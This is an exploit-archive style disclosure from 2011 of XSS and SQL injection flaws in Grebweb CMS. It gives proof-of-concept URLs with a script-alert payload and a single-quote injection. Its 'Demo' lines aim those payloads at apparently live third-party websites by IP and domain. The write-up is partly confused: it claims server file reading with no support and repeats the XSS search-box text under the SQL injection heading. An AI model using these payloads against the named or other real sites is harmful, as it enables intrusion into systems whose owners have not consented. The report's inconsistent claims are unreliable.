---------------------------------------------------------------- Grebweb Cms <= Multiple Disclosure Vulnerabilities ---------------------------------------------------------------- # Exploit Title: Grebweb Cms <= Multiple Disclosure Vulnerabilities # Application Name: [Grebweb Cms] # Date: 30/12/2011 # Author: BHG Security Center # Home: Http://black-hg.org # Software Link: [ http://www.grebweb.com/ ] # Impact : [ High ] # Tested on: [linux+apache] # CVE : Webapps # Finder(s): - Net.Edit0r (Net.edit0r [at] att [dot] net) # Description: : Given the vulnerability you want to read files on the server must have access +-----------------------+ | Cross Site scripting | +-----------------------+ The vulnerable code is located in /admin/index.php?err=[XSS] Proof of Concept: ----------------- ~ PoC : http://localhost/admin/index.php?err=[XSS] ~ Demo : http://202.71.128.172/NIHFW/admin/index.php?err="><script>alert(0)</script> ~ PoC 2 Enter In Search Box XSS Code ~ <FORM NAME="searchzoom" ACTION="index.php" TARGET=_top METHOD="post"> ~ PoC : http://localhost/index.php ~ Demo : http://www.yagyashree.com/index.php +-------------------+ | Sql Injection | +-------------------+ ~ Poc 2 Enter In Search Box XSS Code ~ <FORM NAME="searchzoom" ACTION="index.php" TARGET=_top METHOD="post"> ~ PoC : http://localhost/index.php ~ PoC : http://localhost/NIHFW/view-state.php?id=[Sqli] ~ Demo : http://202.71.128.172/NIHFW/view-state.php?id=' [-] Disclosure timeline: [21/12/2011] - Vulnerabilities discovered [24/12/2011] - Others vulnerabilities discovered [27/12/2011] - Issues reported to http://black-hg.org [30/12/2011] - Public disclosure # Greets To : Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ tHe.k!ll3r ~ Mr.XHat ~ Bl4ck.Viper b3hz4d ~ G3n3Rall ~ NoL1m1t ~ __SENATOR__ ~ NetQurd ~ Cyber C0der THANKS TO ALL Iranian HackerZ ./Persian Gulf ===========================================[End]=============================================